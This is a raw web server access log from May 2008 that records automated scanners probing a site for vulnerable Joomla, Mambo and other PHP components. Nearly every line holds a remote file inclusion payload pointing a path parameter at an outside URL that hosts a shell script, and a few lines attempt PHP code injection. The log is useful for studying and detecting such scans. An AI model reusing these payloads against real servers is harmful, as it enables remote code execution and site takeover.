88.198.9.203 - - [06/May/2008:12:05:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:05:06 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:12:05:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:05:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:05:40 -0700] "GET /logs/access_080224.log/components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:12:06:05 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:06:17 -0700] "GET //Neos_Chronos/header.php?base_folder=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:12:06:20 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:12:06:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:06:56 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:07:03 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:07:08 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:07:08 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.195.11.193 - - [06/May/2008:12:07:09 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [06/May/2008:12:07:10 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [06/May/2008:12:07:11 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:07:12 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:07:13 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:07:13 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:07:13 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:07:14 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:07:14 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:07:17 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:07:17 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:07:17 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:07:17 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:07:17 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:07:17 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:07:29 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:07:35 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:07:35 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:07:35 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:07:40 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:07:40 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:07:40 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:07:57 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:07:57 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:07:57 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:08:00 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:08:00 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:08:01 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:08:20 -0700] "GET //modify.php?dir_module=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:08:21 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:12:08:21 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:08:22 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:08:22 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:08:22 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:08:23 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:08:23 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:08:24 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:08:24 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:08:24 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:08:25 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:08:26 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:08:26 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:08:27 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:08:27 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:08:28 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:12:08:50 -0700] "GET /print.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:09:26 -0700] "GET /logs/access_080218.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:09:49 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:09:49 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:09:49 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:10:00 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:10:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:10:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:10:21 -0700] "GET /logs/access_080218.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:10:35 -0700] "GET /logs/access.log//modify.php?dir_module=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:10:36 -0700] "GET //modify.php?dir_module=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:10:36 -0700] "GET /logs//modify.php?dir_module=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:10:40 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:10:40 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:10:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:10:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:10:58 -0700] "GET /logs/access_080112.log//modify.php?dir_module=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:11:12 -0700] "GET /logs//main.php?sayfa=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:11:13 -0700] "GET //main.php?sayfa=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:11:26 -0700] "GET /logs/access_071224.log/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:11:26 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:11:27 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:11:42 -0700] "GET /logs/access_071224.log/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:11:42 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:11:42 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:11:45 -0700] "GET /logs/access_080309.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:12:11:47 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.60.187 - - [06/May/2008:12:11:56 -0700] "GET /logs/OneAdminhttp://www.pnp21.co.kr/bbs/data/rsta.txt?&? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.47.60.187 - - [06/May/2008:12:12:05 -0700] "GET /OneAdminhttp://www.pnp21.co.kr/bbs/data/rsta.txt?&? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:12:23 -0700] "GET /logs/access_080121.log/components/com_simpleboard/image_upload.php?sbp=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:12:26 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:12:26 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:12:36 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:12:38 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:12:38 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:12:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:12:46 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:12:51 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:12:52 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:12:54 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:12:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:12:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:13:04 -0700] "GET /logs/access_080303.log/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:13:04 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:12:13:04 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:13:07 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:13:07 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:13:08 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:13:10 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:13:24 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
